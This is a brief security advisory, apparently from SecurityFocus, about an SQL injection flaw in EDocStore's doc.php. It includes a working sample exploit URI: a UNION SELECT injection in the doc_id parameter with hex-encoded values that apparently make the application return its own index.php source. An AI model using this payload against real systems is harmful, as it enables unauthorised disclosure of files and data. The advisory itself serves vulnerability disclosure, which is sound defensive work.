EDocStore Doc.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

A sample URI has been provided:

http://www.example.com/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null


 

Privacy Statement
Copyright 2010, SecurityFocus